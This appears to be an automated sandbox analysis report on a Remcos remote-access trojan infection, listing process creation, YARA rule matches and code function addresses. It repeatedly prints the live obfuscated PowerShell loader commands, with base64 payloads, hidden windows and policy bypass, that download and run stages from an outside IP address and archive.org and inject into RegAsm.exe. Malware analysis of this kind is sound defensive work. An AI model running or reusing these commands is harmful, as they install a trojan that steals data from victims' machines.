                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
                      Malicious sample detected (through community Yara rule)
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 6128, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004167EF
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03741D6A3_2_03741D6A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D818657_2_04D81865
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D8155D7_2_04D8155D
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D81E627_2_04D81E62
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D80E257_2_04D80E25
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D8176A7_2_04D8176A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D817257_2_04D81725
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE61989_2_04AE6198
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AEF1D89_2_04AEF1D8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AEF2389_2_04AEF238
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AEF51E9_2_04AEF51E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE1D689_2_04AE1D68
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AEF57D9_2_04AEF57D
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE8E889_2_04AE8E88
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE8E989_2_04AE8E98
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AEF60D9_2_04AEF60D
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AEE8889_2_04AEE888
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AEE8789_2_04AEE878
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE61889_2_04AE6188
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE0A989_2_04AE0A98
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AEF2289_2_04AEF228
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE8BB89_2_04AE8BB8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE8BE09_2_04AE8BE0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE930F9_2_04AE930F
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE0B6A9_2_04AE0B6A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043706A11_2_0043706A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041400511_2_00414005
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E11C11_2_0043E11C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004541D911_2_004541D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004381E811_2_004381E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041F18B11_2_0041F18B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044627011_2_00446270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E34B11_2_0043E34B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004533AB11_2_004533AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042742E11_2_0042742E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043756611_2_00437566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E5A811_2_0043E5A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004387F011_2_004387F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043797E11_2_0043797E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004339D711_2_004339D7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DA4911_2_0044DA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427AD711_2_00427AD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041DBF311_2_0041DBF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427C4011_2_00427C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00437DB311_2_00437DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00435EEB11_2_00435EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043DEED11_2_0043DEED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00426E9F11_2_00426E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
